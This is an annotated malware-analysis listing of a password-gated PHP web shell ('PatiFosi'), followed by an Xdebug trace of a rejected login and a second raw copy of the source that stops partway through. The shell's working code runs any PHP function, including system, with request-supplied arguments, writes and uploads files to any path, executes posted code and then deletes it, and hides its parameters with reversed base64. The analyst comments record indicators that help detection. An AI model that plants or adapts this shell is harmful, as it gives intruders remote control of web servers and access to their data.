<?php
// Analyst note: configuration and request capture for a password-gated PHP web
// shell. Nothing in this run validates or escapes the request values it copies.
// Suppresses PHP error reporting for the rest of the request.
error_reporting(0);
// Asks browsers that still have a legacy XSS filter to switch it off for this response.
header("X-XSS-Protection: 0");
//config login
// localhost/patifosi.php?login=gans
// Name of the query-string parameter that carries the password.
$param = 'login';
// login input
// Unsalted MD5 hex digest that the supplied password must hash to (compared at
// the login check further down). Being a fixed string, it can serve as a static
// indicator for this sample; variants may of course change it.
$pw = 'e5e32f8c9a2e843080f5176871e8cd32';
// md5 password default = gans
$inDir = true;
// true or false, to enable input dir
// Literal body returned to any request that fails the login check.
$out = 'exit;';
// string, not login
$enc = true;
// js must enabled, editor & upload not encoded
// Remote image referenced from the generated HTML (favicon and landing picture),
// so the viewing browser fetches it from that host.
$img = 'https://i.ibb.co/nn0TWhS/patifosi.gif';
// variable
// Raw request values copied into globals. $dirGET keeps `dir` exactly as received
// and is reused when links are built; $dirGet may be decoded further down.
$dirGet = $_GET['dir'];
$dirGET = $_GET['dir'];
$file = $_GET['file'];
$func = $_GET['func'];
$arg = $_GET['arg'];
$mode = $_GET['mode'];
$type = $_GET['type'];
// The password is read from the URL, so it ends up wherever request URLs are
// recorded (access logs, proxies), and the script repeats it in the links it generates.
$pass = $_GET[$param];
$md5 = md5("{$_GET[$param]}");
$host = $_SERVER['HTTP_HOST'];
$uplto = $_POST['uplto'];
$saveto = $_POST['saveto'];
// Overwrites the GET-derived $file assigned above; only the POST value survives.
$file = $_POST['file'];
$sec = $_GET['sec'];
$sc = $_SERVER['SCRIPT_NAME'];
// decode
/**
 * Decodes one obfuscated request value.
 *
 * The input is cast to string, reversed, and base64-decoded (no strict flag is
 * passed); every '=' in the decoded text is then replaced with '-'.
 * The page's own client script produces the matching encoding
 * (`rev(btoa(x)).replace('=', '-')`), so parameter values seen in request logs
 * are reversed base64 rather than plain text and have to be reversed and
 * base64-decoded before they can be matched against function or path names.
 *
 * @param mixed $str Encoded value taken from the request.
 * @return string Decoded text with '=' characters replaced by '-'.
 */
function dec($str)
{
$str = base64_decode(strrev("{$str}"));
return str_replace('=', '-', "{$str}");
}
// Decode step: runs only when a `dir` parameter was sent. All six values are
// decoded together, including the two POST-derived paths and the file name.
// The condition starts with a constant `true` in this listing; the original
// listing further down the page tests `$enc == true` at the same place.
if (true && isset($dirGet)) {
$dirGet = dec($dirGet);
$func = dec($func);
$arg = dec($arg);
$uplto = dec($uplto);
$saveto = dec($saveto);
$file = dec($file);
}
// login
// Access gate: unless md5() of the `login` parameter equals $pw, the script
// prints $out ('exit;') and terminates. Everything below is reachable only with
// the correct password in the query string. The short literal body is therefore
// what an unauthenticated request to this file receives.
if ($md5 !== $pw) {
die("{$out}");
}
// tq
// Credits and dates array; the only later use in this file is the var_dump() in `about` mode.
$w = array("pescyte", "idbte4m", "javcode", "zerobyte", "idxSmg", "patiUndetektet", "date" => "28 Mei 2018", "new date" => "16 Mei 2020");
// sorry for bad code //
// just for fun //
// checked type
// Both flags below only pre-tick checkboxes in the generated form.
if ($type) {
$typeChecked = "checked";
}
// checked iframe
if ($sec) {
$cekSec = "checked";
}
// chdir
// Working directory is switched to the request-supplied path with no restriction,
// so later relative file operations act inside whatever directory was requested.
if ($dirGet) {
chdir($dirGet);
}
// directory
$dirNow = getcwd();
// button encode
// Name of the client-side function wired to the submit buttons; enc() rewrites
// form fields of class `encode` into the reversed-base64 form before sending.
if ($enc) {
$encButton = 'enc()';
} else {
$encButton = '';
}
// upl dir
// Upload and save targets default to the current directory when none was posted.
if ($uplto) {
$uplto = $uplto;
} else {
$uplto = $dirNow;
}
// save dir
if ($saveto) {
$saveto = $saveto;
} else {
$saveto = $dirNow;
}
// input dir
// $dirNow is interpolated into the markup without HTML escaping.
if ($inDir) {
$inputDir = "<th style='display:inline-block'>dir<br><input autocomplete='off' class='encode' type='text' name='dir' value='{$dirNow}' placeholder='/var/www/html'> </th>";
} else {
$Hidinput = "<input class='encode' type='hidden' name='dir' value='{$dirNow}'>";
}
// codemirror library in mode=edit
// NOTE(review): `edit` is an unquoted constant name, not a string, and no such
// constant is defined in this listing. Older PHP versions fall back to the string
// 'edit'; PHP 8 raises an Error for an undefined constant, so behaviour from this
// line on depends on the runtime version the sample is analysed under.
// The assets are pulled from codemirror.net by the viewing browser.
if ($mode == edit) {
$codemirror = "\n <script src='//codemirror.net/lib/codemirror.js'></script>\n <link rel='stylesheet' href='//codemirror.net/lib/codemirror.css'>\n <script src='//codemirror.net/mode/javascript/javascript.js'></script>\n <link rel='stylesheet' href='//codemirror.net/theme/monokai.css'>\n <script src='//codemirror.net/addon/edit/matchbrackets.js'></script>\n ";
}
// ?mode=api
// API mode: the script's headless remote-execution path. `dir`, `func` and `arg`
// are decoded straight from the query string, the working directory is changed,
// and if `func` names any function PHP knows, it is called with `arg` as its
// single argument; the return value is sent back through die(). No allow-list
// or further check is applied after the login gate.
// Requests on this path carry `mode=api` together with encoded `func` and `arg`
// values in the URL, which is what to look for in web server logs.
// `api` is written as an unquoted constant name in the comparison.
if ($mode == api) {
$dirGet = dec($_GET['dir']);
$func = dec($_GET['func']);
$arg = dec($_GET['arg']);
chdir($dirGet);
if (function_exists($func)) {
// '@' suppresses any warning raised by the call.
@die($func($arg));
} else {
echo "failed";
}
exit;
}
// Client-side console helper, emitted into the page as JavaScript. The generated
// code embeds the host, script path and the plaintext login value, and defines
// dir()/cd()/run() helpers that send reversed-base64 `func`/`arg` pairs to the
// mode=api endpoint through XMLHttpRequest and print the response to the console.
$apiJs = "var dirNow = '{$dirNow}'; var func; var arg; var login = '{$host}{$sc}?{$param}={$pass}'; var api = login+'&mode=api'; var reqDir = api+'&dir='+rev(btoa(dirNow)).replace('=', '-');\n\n clear();\n\n function dir(){\n console.log(dirNow);\n };\n\n function cd(a){\n dirNow = a;\n var b = rev(btoa(a)).replace('=', '-');\n reqDir = api+'&dir='+b\n console.log(dirNow);\n };\n\n function go(a){\n var xmlhttp = new XMLHttpRequest();\n xmlhttp.timeout = 600000;\n xmlhttp.onreadystatechange = function() {\n if (this.readyState == 4 && this.status == 200) {\n console.log(this.responseText);\n }\n };\n\n xmlhttp.ontimeout = function (e) {\n console.log('time out');\n };\n\n xmlhttp.open('GET', a, true);\n xmlhttp.send();\n };" . '
function clear(){
console.clear();
console.log("%cPatiFosi", "background:#ff6b81; color:#2f3542; font-size:30px; font-family: Arial, Helvetica, sans-serif;");
console.log("dir()\\t\\t\\t\\t\\t\\/\\/ show dir now\\r\\ncd(\\"\\/www\\/html\\/tmp\\")\\t\\t\\/\\/ change dir\\r\\nrun(\\"system\\", \\"ls\\")\\t\\t\\/\\/ run command\\r\\nclear()");
}' . "\n\n function run(f, n){\n f = rev(btoa(f)).replace('=', '-');\n n = rev(btoa(n)).replace('=', '-');\n l = reqDir+'&func='+f+'&arg='+n;\n go('//'+l);\n };\n";
// ?mode=iframe
// Iframe mode: returns a bare page that frames the command form full-screen and
// carries the console helper above; the login value is repeated in the iframe URL.
if ($mode == iframe) {
die("<title>PatiFosi</title><link rel='icon' href='{$img}' type='image/gif'><iframe src='?{$param}={$pass}&mode=command' style='position:fixed; top:0px; bottom:0px; right:0px; width: 100%; border: none; margin:0; padding:0; overflow: hidden; z-index:999999; height: 100%;'></iframe><script>function rev(str) {return str.split('').reverse().join('');}{$apiJs}</script>");
}
// run code
// "Run" path, step 1: when the POST field `run` is set, the submitted `code` is
// written to disk, either to the decoded `tmp` path if one was posted or to a
// fresh tempnam() file in the system temp directory. A link carrying that path
// in the `run` query parameter is then prepared for display.
if ($_POST['run']) {
$code = $_POST['code'];
if ($_POST['tmp']) {
$tmp_file = dec($_POST['tmp']);
} else {
$tmp_file = tempnam(sys_get_temp_dir(), '');
}
if (file_put_contents("{$tmp_file}", "{$code}")) {
$tmp_run = "<mark style='background: #ffffff'><a href='?{$param}={$pass}&run={$tmp_file}' target='_blank' style='color:#2ed573'> run click here</a> -> {$tmp_file}";
} else {
$tmp_run = "<mark style='background: #ffffff'><a style='color:#ff4757'> failed saving tmp -> {$tmp_file}";
}
}
// Step 2: a request with `run` in the query string include()s that path as PHP
// and then deletes it with unlink(). The path is used exactly as received (it is
// not passed through dec() here), so it appears in clear text in the request URL.
// Because the file is removed right after execution, on-disk evidence of the
// payload is short-lived; the request log entry outlasts it.
if ($_GET['run']) {
$runIn = $_GET['run'];
include "{$runIn}";
unlink($runIn);
exit;
}
echo "<html>\n<head>\n<title>PatiFosi</title>\n<link rel='icon' href='{$img}' type='image/gif'>\n<style>\n#clear { text-decoration: none; }\n.shadow {\n -moz-box-shadow: 4px 5px 7px rgba(0, 0, 0,0.5);\n -webkit-box-shadow: 4px 5px 7px rgba(0, 0, 0, .5);\n box-shadow: 4px 5px 7px rgba(0, 0, 0, .5);\n}\ninput { background-color: #ffffff; color: #2f3542; }\n</style>\n{$codemirror}\n<script>\nfunction rev(str) {\n return str.split('').reverse().join('');\n}\n\nfunction enc() {\n var x = document.getElementsByClassName('encode');\n var i;\n for (i = 0; i < x.length; i++) {\n x[i].value = rev(btoa(x[i].value)).replace('=', '-');\n }\n}\n\nfunction decFunc(){\n\tvar i;\n\tvar a = document.getElementById('funcList').options;\n\tvar b = document.getElementById('funcList');\n\tvar c = document.getElementById('func');\n\n\tfor (i = 0; i < a.length; i++) {\n\tb.options[i].value = atob(rev(b.options[i].value).replace('-', '='));\n\t}\n\tc.setAttribute('onfocus', '')\n}\n\nfunction isiArg(){\n\tvar a = document.getElementById('func').value;\n\tvar b = document.getElementById('arg');\n\tvar c = document.getElementById('funcList');\n\n\tif (a == c.options[0].value) {\n\t\tb.value = '123';\n\t} else if (a == c.options[1].value) {\n\t\tb.value = '/';\n\t} else if (a == c.options[5].value) {\n b.value = '.';\n } else if (a == c.options[2].value || a == c.options[3].value || a == c.options[4].value) {\n\t\tb.value = 'ls';\n\t} else if (a == c.options[6].value) {\n\t\tb.value = '*.html';\n\t} else if (a == c.options[7].value || a == c.options[8].value || a == c.options[9].value || a == c.options[10].value || a == c.options[11].value || a == c.options[13].value) {\n\t\tb.value = 'file.php';\n\t} else if (a == c.options[12].value) {\n\t\tb.value = 'new';\n\t}\n}\n\n{$apiJs}\n</script>\n</head>\n\n<body style='padding:5%; padding-top:2%; border: 3px solid #2f3542; font-family: Arial, Helvetica, sans-serif; background:#f1f2f6;'>\n <datalist id='funcList'>\n <option value='-=wbm5WawhGc'>\n 
<option value='-=QZjFGcz9FbhR3b091azlGZ'>\n <option value='tVGdzl3c'>\n <option value='-UncoR3czFGc'>\n <option value='-=wYlhXZfxGblh2c'>\n <option value='-=gcpRmbhN2c'>\n <option value='-=gYvx2Z'>\n <option value='MHduVGdu92YfRXZn9VZslmZ'>\n <option value='-UGbpZGZhVmc'>\n <option value='-UGbpZ2X0h2ZpxGanlGa'>\n <option value='-=QZslmZ'>\n <option value='r5Was5Wd'>\n <option value='-IXaktWb'>\n <option value='-g2Y19Gd'>\n </datalist>\n \n<center><h1 style='color:#2f3542'>PatiFosi</h1></center>\n<a style='font-size:10; color:#ff4757'>{$host}</a>\n<a style='font-size:10; color:#a4b0be'>@</a>\n<a style='font-size:10; color:#2f3542'>{$dirNow}</a>\n<a style='font-size:10; color:#ff4757' href='?{$param}={$pass}'>[Home]</a><center>\n<div style='background-color: #ff6b81'>\n<a id='clear' style='color:#2f3542' href='?{$param}={$pass}&mode=command&dir={$dirGET}'>[command] - </a>\n<a id='clear' style='color:#2f3542' href='?{$param}={$pass}&mode=edit&dir={$dirGET}'>[edit] - </a>\n<a id='clear' style='color:#2f3542' href='?{$param}={$pass}&mode=about&dir={$dirGET}'>[about] </a>\n</div>\n<br><br>\n";
// mode command
if ($mode == "command") {
$arg2 = htmlspecialchars($arg, ENT_QUOTES, 'UTF-8');
echo " <form method='get' autocomplete='off'>\n <table id='clear' style='text-align:center'>\n <input type='hidden' name='{$param}' value='{$pass}'>\n <input type='hidden' name='mode' value='command'>\n {$Hidinput}\n <tr>\n <th style='display:inline-block'>iframe<br><input type='checkbox' name='sec' value='y' {$cekSec}> </th>\n {$inputDir}\n <th style='display:inline-block'>func<br><input oninput='isiArg()' id='func' onfocus='decFunc()' list='funcList' class='encode' type='text' name='func' value='{$func}' placeholder='system'> </th>\n <th style='display:inline-block'>arg<br><input id='arg' class='encode' type='text' name='arg' value='{$arg2}' placeholder='ls'> </th> \n <td><br><input type='checkbox' name='type' value='checked' {$typeChecked} >array <input onclick='{$encButton}' type='submit' value='Submit' style='background-color: #57606f;color: #f1f2f6;'>\n </td>\n </tr>\n </table>\n </form>\n </center><br>\n <pre style='background:#dfe4ea; color: #2f3542; border-right: 6px solid #ced6e0;'>";
// Command-mode execution. In every branch the request-named function is called
// with the request-supplied argument, guarded only by function_exists().
// With type=checked the result is var_dump()ed; otherwise it is echoed or passed
// to die(). When sec=y the output is captured and re-embedded as a base64 data:
// URI inside an iframe instead of being written into the page directly.
// $func and $arg are also printed into the <i> preview lines without escaping.
if ($type == 'checked') {
echo "<i>var_dump({$func}({$arg}));</i><br>";
if (function_exists($func)) {
if ($sec == 'y') {
ob_start();
@var_dump($func($arg));
$run = ob_get_clean();
echo "</pre><iframe class='shadow' style='border:none' width='100%' height='100%' src='data:text/html;base64," . base64_encode($run) . "'></iframe>";
} else {
@var_dump($func($arg));
}
}
} else {
if (function_exists($func)) {
if ($sec == 'y') {
ob_start();
echo $func($arg);
$run = ob_get_clean();
echo "<i>echo({$func}({$arg}));</i><br>";
echo "</pre><iframe class='shadow' style='border:none' width='100%' height='100%' src='data:text/html;base64," . base64_encode($run) . "'></iframe>";
} else {
echo "<i>die({$func}({$arg}));</i><br>";
// Ends the response here; the rest of the page is never sent in this branch.
@die($func($arg));
}
}
}
// mode edit
} elseif ($mode == "edit") {
$arg2 = htmlspecialchars($arg, ENT_QUOTES, 'UTF-8');
echo "\n \n <form method='get'>\n <table id='clear' style='text-align:center'>\n <input type='hidden' name='{$param}' value='{$pass}'>\n <input type='hidden' name='mode' value='edit'>\n {$Hidinput}\n <tr>\n {$inputDir}\n <th style='display:inline-block'>func<br><input oninput='isiArg()' id='func' onfocus='decFunc()' list='funcList' autocomplete='off' class='encode' type='text' name='func' value='{$func}' placeholder='readfile'> </th>\n <th style='display:inline-block'>arg<br><input id='arg' autocomplete='off' class='encode' type='text' name='arg' value='{$arg2}' placeholder='file.php'> </th> \n <td><br><input type='checkbox' name='type' value='ob' {$typeChecked}>ob <input onclick='{$encButton}' type='submit' value='Submit' style='background-color: #57606f;color: #f1f2f6;'>\n </td>\n </tr>\n </table>\n </form></center>\n <div align='right'>\n <button class='shadow' type='button' onclick='fullN()' style='border-radius: 50%; border: none; background-color: #eccc68; color: #f1f2f6; text-align:right'>_</button>\n <button class='shadow' type='button' onclick='full()' style='border-radius: 50%; border: none; background-color: #2ed573; color: #f1f2f6; text-align:right'>_</button>\n <button class='shadow' type='button' onclick='reset()' style='border-radius: 50%; border: none; background-color: #ff4757; color: #f1f2f6; text-align:right'>_</button>\n <br></div>\n <form method='post' action='?{$param}={$pass}&mode=edit&dir={$dirGET}&type={$type}' enctype='multipart/form-data'>\n <div class='shadow'><textarea id='codemirror' name='code' style='width:100%; height: 50%;'>";
// codemirror
if (!empty($_GET['func']) && !empty($_GET['arg'])) {
if ($_GET['type'] !== 'ob') {
echo htmlspecialchars($func($arg));
} else {
ob_start();
htmlspecialchars($func($arg));
$run = ob_get_clean();
echo htmlspecialchars($run);
}
} elseif ($_POST['code']) {
echo htmlspecialchars($_POST['code']);
}
echo "</textarea></div><br><input type='hidden' name='tmp' class='encode' value='{$tmp_file}'><input onclick='{$encButton}' type='submit' name='run' value='run >>' style='background-color: #747d8c;color: #f1f2f6; float: right;'>\n\n <table style='width:100%'>\n <tr style='text-align:center'>\n <th style='display:inline-block; padding-right:10%; padding-left:10%;'>upload<br><input autocomplete='off' class='encode' type='text' name='uplto' value='{$uplto}' placeholder='{$dirNow}'><br><input type='file' name='datupload' style='border: 1px solid #dfe4ea; background:#f1f2f6;'><br><input onclick='{$encButton}' type='submit' name='uploadsubmit' value='upload' style='background-color: #57606f;color: #f1f2f6;'>\n </th>\n <th style='display:inline-block; padding-left:10%; padding-right:10%;'>save<br><input autocomplete='off' class='encode' type='text' name='saveto' value='{$saveto}' placeholder='{$dirNow}'><br><input autocomplete='off' class='encode' type='text' name='file' value='{$file}' placeholder='file.php'><br><input onclick='{$encButton}' type='submit' name='savesubmit' value='save' style='background-color: #57606f;color: #f1f2f6;'>\n </form></th>\n </tr>\n </table>\n <script>\n var myCodeMirror = CodeMirror.fromTextArea(document.getElementById('codemirror'), {\n theme: 'monokai',\n lineNumbers: true,\n matchBrackets: true,\n mode: 'javascript',\n viewportMargin: false,\n });\n\n function full(){\n myCodeMirror.setSize('100%', '100%');\n }\n\n function fullN(){\n myCodeMirror.setSize('100%', '60%');\n }\n\n function reset() {\n var txt;\n if (confirm('Ar u sure wanna reset d code?')) {\n myCodeMirror.setValue('');\n }\n }\n </script>\n ";
echo "<center><hr style='border-top: 1px solid #dfe4ea' width='90%'><h4>";
// File-write paths of edit mode. Each branch ends the response with die().
if (isset($_POST['savesubmit'])) {
// Save: switch to the requested directory, then write the posted `code` to the
// requested file name. Neither the directory nor the name is restricted.
if (!chdir($saveto)) {
die("<mark style='background: #ffffff'><a style='color:#ff4757'> directory not exist -> {$saveto}");
}
// $fpc is assigned but not used in this listing; the original listing further
// down the page builds this name from two string fragments and calls through it.
$fpc = 'file_put_contents';
$write = file_put_contents($file, $_POST['code']);
if ($write) {
die("<mark style='background: #ffffff'><a style='color:#2ed573'> saved -> {$file}");
} else {
die("<mark style='background: #ffffff'><a style='color:#ff4757'> failed save -> {$file}");
}
} elseif (isset($_POST['uploadsubmit'])) {
// Upload: switch to the requested directory and copy the uploaded temp file to
// the client-supplied file name. No extension, type or content check is made,
// and copy() is used rather than move_uploaded_file().
if (!chdir($uplto)) {
die("<mark style='background: #ffffff'><a style='color:#ff4757'> directory not exist -> {$uplto}");
}
$uploadname = $_FILES['datupload']['name'];
$uploadtmp = $_FILES['datupload']['tmp_name'];
$write = copy($uploadtmp, $uploadname);
if ($write) {
die("<mark style='background: #ffffff'><a style='color:#2ed573'> uploaded -> {$uploadname}");
} else {
die("<mark style='background: #ffffff'><a style='color:#ff4757'> failed upload -> {$uploadname}");
}
} elseif ($tmp_run) {
// Shows the status/link string prepared earlier by the "run" handler.
die("{$tmp_run}");
}
// mode about
} elseif ($mode == "about") {
echo "</center><pre style=\"background:#dfe4ea; color: #2f3542; border-right: 6px solid #ced6e0;\"><i>var_dump(\$w);</i><br>";
echo var_dump($w);
} else {
echo "<img src='{$img}'><br>what ar u doin?<br>dont forget to open <b>console.log<b><br><br><a style='font-size:10; color:#ff4757' href='?{$param}={$pass}&mode=iframe'>[Go to iframe mode]</a>\n <noscript><i>javascript isn't running</i></noscript><script>\n if(!navigator.onLine) {\n alert('u must connect internet for best experience');\n }\n </script>";
}
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:52:32.946514]
1 0 1 0.000159 393528
1 3 0 0.000527 450648 {main} 1 /var/www/html/uploads/patifosi.php 0 0
2 4 0 0.000545 450648 error_reporting 0 /var/www/html/uploads/patifosi.php 2 1 0
2 4 1 0.000560 450688
2 4 R 22527
2 5 0 0.000574 450648 header 0 /var/www/html/uploads/patifosi.php 3 1 'X-XSS-Protection: 0'
2 5 1 0.000591 450744
2 5 R NULL
1 A /var/www/html/uploads/patifosi.php 6 $param = 'login'
1 A /var/www/html/uploads/patifosi.php 7 $pw = 'e5e32f8c9a2e843080f5176871e8cd32'
1 A /var/www/html/uploads/patifosi.php 8 $inDir = TRUE
1 A /var/www/html/uploads/patifosi.php 9 $out = 'exit;'
1 A /var/www/html/uploads/patifosi.php 10 $enc = TRUE
1 A /var/www/html/uploads/patifosi.php 11 $img = 'https://i.ibb.co/nn0TWhS/patifosi.gif'
1 A /var/www/html/uploads/patifosi.php 14 $dirGet = NULL
1 A /var/www/html/uploads/patifosi.php 15 $dirGET = NULL
1 A /var/www/html/uploads/patifosi.php 16 $file = NULL
1 A /var/www/html/uploads/patifosi.php 17 $func = NULL
1 A /var/www/html/uploads/patifosi.php 18 $arg = NULL
1 A /var/www/html/uploads/patifosi.php 19 $mode = NULL
1 A /var/www/html/uploads/patifosi.php 20 $type = NULL
1 A /var/www/html/uploads/patifosi.php 21 $pass = NULL
2 6 0 0.000757 450712 md5 0 /var/www/html/uploads/patifosi.php 22 1 ''
2 6 1 0.000771 450808
2 6 R 'd41d8cd98f00b204e9800998ecf8427e'
1 A /var/www/html/uploads/patifosi.php 22 $md5 = 'd41d8cd98f00b204e9800998ecf8427e'
1 A /var/www/html/uploads/patifosi.php 23 $host = 'localhost'
1 A /var/www/html/uploads/patifosi.php 24 $uplto = NULL
1 A /var/www/html/uploads/patifosi.php 25 $saveto = NULL
1 A /var/www/html/uploads/patifosi.php 26 $file = NULL
1 A /var/www/html/uploads/patifosi.php 27 $sec = NULL
1 A /var/www/html/uploads/patifosi.php 28 $sc = '/uploads/patifosi.php'
0.000904 371624
TRACE END [2023-02-12 22:52:32.947303]
<html><head></head><body>exit;</body></html>
<?php
// Analyst note: original (unformatted) listing of the same sample. This run sets
// the shell's configuration and copies request parameters into globals without
// validation or escaping.
// Suppresses PHP error reporting for the rest of the request.
error_reporting(0);
// Asks browsers that still have a legacy XSS filter to switch it off for this response.
header("X-XSS-Protection: 0");
//config login
// localhost/patifosi.php?login=gans
$param = 'login'; // login input
// Unsalted MD5 hex digest the supplied password must hash to; a fixed string
// that can be matched as a static indicator for this sample.
$pw = 'e5e32f8c9a2e843080f5176871e8cd32'; // md5 password default = gans
$inDir = true; // true or false, to enable input dir
$out = 'exit;'; // string, not login
$enc = true; // js must enabled, editor & upload not encoded
// Remote image referenced from the generated HTML; fetched by the viewing browser.
$img = 'https://i.ibb.co/nn0TWhS/patifosi.gif';
// variable
// $dirGET keeps `dir` exactly as received for link building; $dirGet may be decoded below.
$dirGet = $_GET['dir'];
$dirGET = $_GET['dir'];
$file = $_GET['file'];
$func = $_GET['func'];
$arg = $_GET['arg'];
$mode = $_GET['mode'];
$type = $_GET['type'];
// Password is taken from the URL, so it is present wherever request URLs are logged.
$pass = $_GET[$param];
$md5 = md5("$_GET[$param]");
$host = $_SERVER['HTTP_HOST'];
$uplto = $_POST['uplto'];
$saveto = $_POST['saveto'];
// Overwrites the GET-derived $file assigned above.
$file = $_POST['file'];
$sec = $_GET['sec'];
$sc = $_SERVER['SCRIPT_NAME'];
// decode
/**
 * Decodes one obfuscated request value: the input is cast to string, reversed
 * and base64-decoded (no strict flag is passed), and every '=' in the decoded
 * text is then replaced with '-'.
 *
 * Request parameters handled by this function therefore appear in logs as
 * reversed base64, not as readable function names or paths.
 *
 * @param mixed $str Encoded value taken from the request.
 * @return string Decoded text with '=' characters replaced by '-'.
 */
function dec($str){
$str = base64_decode(strrev("$str"));
return str_replace('=', '-', "$str");
}
// Decode step: with $enc enabled (it is set to true in the config above) and a
// `dir` parameter present, all six request values are decoded together.
if($enc == true && isset($dirGet)){
$dirGet = dec($dirGet);
$func = dec($func);
$arg = dec($arg);
$uplto = dec($uplto);
$saveto = dec($saveto);
$file = dec($file);
};
// login
// Access gate: unless md5() of the `login` parameter equals $pw, the script
// prints $out ('exit;') and terminates, so that literal body is what an
// unauthenticated request receives. The `exit;` after die() is never reached.
if($md5 !== $pw){
die("$out");
exit;
}
// tq
$w = array("pescyte", "idbte4m", "javcode", "zerobyte", "idxSmg", "patiUndetektet", "date"=>"28 Mei 2018", "new date"=>"16 Mei 2020");
// sorry for bad code //
// just for fun //
// checked type
if($type){
$typeChecked = "checked";
};
// checked iframe
if($sec){
$cekSec = "checked";
};
// chdir
if($dirGet){
chdir($dirGet);
};
// directory
$dirNow = getcwd();
// button encode
if($enc){
$encButton = 'enc()';
}else{
$encButton = '';
};
// upl dir
if($uplto){
$uplto = $uplto;
}else{
$uplto = $dirNow;
};
// save dir
if($saveto){
$saveto = $saveto;
}else{
$saveto = $dirNow;
};
// input dir
if($inDir){
$inputDir = "<th style='display:inline-block'>dir<br><input autocomplete='off' class='encode' type='text' name='dir' value='$dirNow' placeholder='/var/www/html'> </th>";
} else {
$Hidinput = "<input class='encode' type='hidden' name='dir' value='$dirNow'>";
};
// codemirror library in mode=edit
if($mode == edit){
$codemirror = "
<script src='//codemirror.net/lib/codemirror.js'></script>
<link rel='stylesheet' href='//codemirror.net/lib/codemirror.css'>
<script src='//codemirror.net/mode/javascript/javascript.js'></script>
<link rel='stylesheet' href='//codemirror.net/theme/monokai.css'>
<script src='//codemirror.net/addon/edit/matchbrackets.js'></script>
";
};
// ?mode=api
// API mode: headless remote-execution path. `dir`, `func` and `arg` are decoded
// from the query string, the working directory is changed, and any function PHP
// knows by the name in `func` is called with `arg` as its single argument; the
// return value is sent back through die(). Only the login gate precedes this.
// In logs this path shows as `mode=api` with encoded `func` and `arg` values.
// `api` is written as an unquoted constant name in the comparison.
if($mode == api){
$dirGet = dec($_GET['dir']);
$func = dec($_GET['func']);
$arg = dec($_GET['arg']);
chdir($dirGet);
if (function_exists($func)) {
// '@' suppresses any warning raised by the call.
@die($func($arg));
}else{
echo 'failed';
}
exit;
}
$apiJs = "var dirNow = '$dirNow'; var func; var arg; var login = '$host$sc?$param=$pass'; var api = login+'&mode=api'; var reqDir = api+'&dir='+rev(btoa(dirNow)).replace('=', '-');
clear();
function dir(){
console.log(dirNow);
};
function cd(a){
dirNow = a;
var b = rev(btoa(a)).replace('=', '-');
reqDir = api+'&dir='+b
console.log(dirNow);
};
function go(a){
var xmlhttp = new XMLHttpRequest();
xmlhttp.timeout = 600000;
xmlhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
console.log(this.responseText);
}
};
xmlhttp.ontimeout = function (e) {
console.log('time out');
};
xmlhttp.open('GET', a, true);
xmlhttp.send();
};" . '
function clear(){
console.clear();
console.log("%cPatiFosi", "background:#ff6b81; color:#2f3542; font-size:30px; font-family: Arial, Helvetica, sans-serif;");
console.log("dir()\t\t\t\t\t\/\/ show dir now\r\ncd(\"\/www\/html\/tmp\")\t\t\/\/ change dir\r\nrun(\"system\", \"ls\")\t\t\/\/ run command\r\nclear()");
}' . "
function run(f, n){
f = rev(btoa(f)).replace('=', '-');
n = rev(btoa(n)).replace('=', '-');
l = reqDir+'&func='+f+'&arg='+n;
go('//'+l);
};
";
// ?mode=iframe
if($mode == iframe){
die("<title>PatiFosi</title><link rel='icon' href='$img' type='image/gif'><iframe src='?$param=$pass&mode=command' style='position:fixed; top:0px; bottom:0px; right:0px; width: 100%; border: none; margin:0; padding:0; overflow: hidden; z-index:999999; height: 100%;'></iframe><script>function rev(str) {return str.split('').reverse().join('');}$apiJs</script>");
exit;
}
// run code
// "Run" path, step 1: when the POST field `run` is set, the submitted `code` is
// written to the decoded `tmp` path if one was posted, otherwise to a new
// tempnam() file in the system temp directory, and a link carrying that path in
// the `run` query parameter is prepared.
if($_POST['run']){
$code = $_POST['code'];
if($_POST['tmp']){
$tmp_file = dec($_POST['tmp']);
}else{
$tmp_file = tempnam(sys_get_temp_dir(), '');
};
if(file_put_contents("$tmp_file","$code")){
$tmp_run = "<mark style='background: #ffffff'><a href='?$param=$pass&run=$tmp_file' target='_blank' style='color:#2ed573'> run click here</a> -> $tmp_file";
}else{
$tmp_run = "<mark style='background: #ffffff'><a style='color:#ff4757'> failed saving tmp -> $tmp_file";
};
};
// Step 2: a request with `run` in the query string include()s that path as PHP
// and then unlink()s it. The path is used as received, so it is visible in clear
// text in the request URL, while the file itself is gone after execution.
if($_GET['run']){
$runIn = $_GET['run'];
include "$runIn";
unlink($runIn);
exit;
};
// header html
echo "<html>
<head>
<title>PatiFosi</title>
<link rel='icon' href='$img' type='image/gif'>
<style>
#clear { text-decoration: none; }
.shadow {
-moz-box-shadow: 4px 5px 7px rgba(0, 0, 0,0.5);
-webkit-box-shadow: 4px 5px 7px rgba(0, 0, 0, .5);
box-shadow: 4px 5px 7px rgba(0, 0, 0, .5);
}
input { background-color: #ffffff; color: #2f3542; }
</style>
$codemirror
<script>
function rev(str) {
return str.split('').reverse().join('');
}
function enc() {
var x = document.getElementsByClassName('encode');
var i;
for (i = 0; i < x.length; i++) {
x[i].value = rev(btoa(x[i].value)).replace('=', '-');
}
}
function decFunc(){
var i;
var a = document.getElementById('funcList').options;
var b = document.getElementById('funcList');
var c = document.getElementById('func');
for (i = 0; i < a.length; i++) {
b.options[i].value = atob(rev(b.options[i].value).replace('-', '='));
}
c.setAttribute('onfocus', '')
}
function isiArg(){
var a = document.getElementById('func').value;
var b = document.getElementById('arg');
var c = document.getElementById('funcList');
if (a == c.options[0].value) {
b.value = '123';
} else if (a == c.options[1].value) {
b.value = '/';
} else if (a == c.options[5].value) {
b.value = '.';
} else if (a == c.options[2].value || a == c.options[3].value || a == c.options[4].value) {
b.value = 'ls';
} else if (a == c.options[6].value) {
b.value = '*.html';
} else if (a == c.options[7].value || a == c.options[8].value || a == c.options[9].value || a == c.options[10].value || a == c.options[11].value || a == c.options[13].value) {
b.value = 'file.php';
} else if (a == c.options[12].value) {
b.value = 'new';
}
}
$apiJs
</script>
</head>
<body style='padding:5%; padding-top:2%; border: 3px solid #2f3542; font-family: Arial, Helvetica, sans-serif; background:#f1f2f6;'>
<datalist id='funcList'>
<option value='-=wbm5WawhGc'>
<option value='-=QZjFGcz9FbhR3b091azlGZ'>
<option value='tVGdzl3c'>
<option value='-UncoR3czFGc'>
<option value='-=wYlhXZfxGblh2c'>
<option value='-=gcpRmbhN2c'>
<option value='-=gYvx2Z'>
